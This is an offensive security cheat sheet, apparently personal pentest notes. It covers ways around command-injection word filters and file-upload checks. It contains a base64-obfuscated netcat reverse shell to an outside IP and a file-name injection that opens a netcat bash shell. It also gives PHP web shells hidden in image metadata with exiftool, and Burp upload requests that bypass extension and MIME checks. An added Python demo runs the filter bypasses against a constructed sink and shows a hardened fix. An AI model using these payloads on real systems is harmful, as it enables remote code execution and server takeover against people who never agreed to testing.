Hack$Notes
Evasion Techniques

Evasion

If a filter blocks the literal word "cat" (or any other blacklisted command name), the shell still resolves each of the following to cat, because the filter matches on the raw string while the shell parses quotes and escapes first:

c"a"t      empty double-quoted string inside the word
ca``t      empty command substitution inside the word
ca\t       backslash-escaped character (\t is just t to the shell)
$(id)      command substitution; also a quick test that injection works at all
;cat       command separators that append a second command to the injected one
||cat
&& cat
|`echo "bmMgMTAuMTAuMTAuMTAgNTMgLWUgL2Jpbi9iYXNo" | base64 -d`   
    bmMgMTAuMTAuMTAuMTAgNTMgLWUgL2Jpbi9iYXNo: nc 10.10.10.10 53 -e /bin/bash
    The decoded command never appears in the request, so a word filter has nothing to match; the backticks run it once decoded.

GET parameter

When the server pastes a query parameter into a shell command, wrap your command in backticks so the shell substitutes its output (URL-encode the backticks as %60 if the client strips them; $(ls) works the same way):
http://IP:PORT/something?parameter=`ls`        
http://IP:PORT/something?parameter=`whoami`
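The spellings above, run against a command-injection sink with a word blacklist, as an added example (not from the original notes). Everything in it is constructed: the blacklist, the handler that shells out, the file it reads, and the hardened replacement; the handler models a web endpoint that pastes a request parameter into a shell command, which is also the situation the GET-parameter trick relies on.

```python
"""Constructed demo: cat spellings from the list above vs. a naive word filter."""
import os
import re
import subprocess
import tempfile

BLOCKLIST = ("cat",)  # hypothetical filter: reject the word, then shell out anyway


def vulnerable_run(param: str) -> str:
    """Hypothetical sink: blacklist the literal word, then hand the string to /bin/sh.

    Returns the command's stdout, or "blocked" when the filter fires.
    """
    if any(word in param for word in BLOCKLIST):
        return "blocked"
    proc = subprocess.run(["sh", "-c", param], capture_output=True, text=True)
    return proc.stdout.strip()


def hardened_run(param: str) -> str:
    """Fixed sink: the parameter is validated as a path and passed as a single
    argv element to a fixed program, so no shell ever parses it."""
    if not re.fullmatch(r"[A-Za-z0-9._/-]+", param):
        return "rejected"
    proc = subprocess.run(["cat", "--", param], capture_output=True, text=True)
    return proc.stdout.strip()


def demo() -> dict:
    """Run each spelling against both sinks on a constructed secret file."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write("secret\n")
    try:
        spellings = {
            "plain": f"cat {path}",          # caught: the literal word is present
            "quotes": f'c"a"t {path}',       # "" is an empty quoted string inside the word
            "backticks": f"ca``t {path}",    # `` is an empty command substitution
            "backslash": f"ca\\t {path}",    # \t is just an escaped t to sh
            "base64": f"`echo Y2F0 | base64 -d` {path}",  # Y2F0 decodes to cat
        }
        results = {name: vulnerable_run(cmd) for name, cmd in spellings.items()}
        results["hardened_quotes"] = hardened_run(f'c"a"t {path}')
        results["hardened_plain"] = hardened_run(path)
        return results
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for name, out in demo().items():
        print(f"{name:16} -> {out}")
```

Only the plain spelling is stopped by the blacklist; every quoted or substituted form reads the file, and the base64 form works because the shell builds the command name at run time. The hardened sink is the actual fix: an allowlist on the value and no shell in the call path, so there is nothing left for quoting tricks to exploit.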

Exiftool

Download a legitimate image and write the PHP into one of its metadata fields (the backslashes keep the shell from expanding the $ signs inside the double-quoted argument):
1) exiftool -DocumentName="<?php echo '<h1>Something</h1>'; if(isset(\$_REQUEST['cmd'])) {echo '<pre>'; \$cmd=\$_REQUEST['cmd']; system(\$cmd); echo '</pre>'; } __halt_compiler(); ?>" index.jpg
or
2) exiftool -Comment="<?php passthru(\$_GET['cmd']); __halt_compiler();" index.jpg

The file keeps its JPEG signature, so magic-number and image-library checks still pass. The code only runs if the server later executes the file as PHP (uploaded under an extension the PHP handler owns, or pulled in through an LFI/include), and __halt_compiler() stops the PHP parser before it reaches the binary image data that follows the tag.

Using BurpSuite

Intercept the multipart upload and edit the part that carries the file. Each variant below defeats a different check:

Content-Disposition: form-data; name="image"; filename="shell.php5"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>

Alternative extension: a blacklist that only lists .php misses .php5/.phtml/.phar, which the server may still hand to PHP.
======================================================================
Content-Disposition: form-data; name="image"; filename="shell.jpg.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>

Double extension: satisfies a check that looks for ".jpg" anywhere in the name while the last extension still selects the PHP handler.
======================================================================
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: image/jpeg

<?php system($_GET['cmd']); ?>

Spoofed Content-Type: the header is client-controlled, so a check that trusts it accepts the file.

Name Injection

 touch ';nc my_ip_address 1337 -c bash'

Works where a script (a cron job or an upload processor, for example) builds a shell command string out of file names and runs it through sh -c, eval or a system() call: the ; ends the intended command and nc runs next. Plain word splitting does not re-parse the ;, so the name has to reach a shell parser. -c executes through /bin/sh in netcat-traditional and Ncat; use -e where the build lacks -c.

Unrestricted File Upload

File Filtering Upload

Checks an upload handler may apply, and what each one actually inspects:

Extension Validation        last extension against a blacklist or allowlist (see the Burp variants above)
File Type Filtering
    - MIME                  the client-supplied Content-Type header, changed freely in the request
    - Magic Number          the leading bytes of the file    https://en.wikipedia.org/wiki/List_of_file_signatures 
File Length Filtering       size of the upload
File Name Filtering         characters or length of the name (see Name Injection above)
File Content Filtering      the bytes themselves, e.g. scanning for <?php

Links

PHP Type Juggling and Authentication Bypass
Unrestricted File Upload | OWASP Foundation

Last updated 3 years ago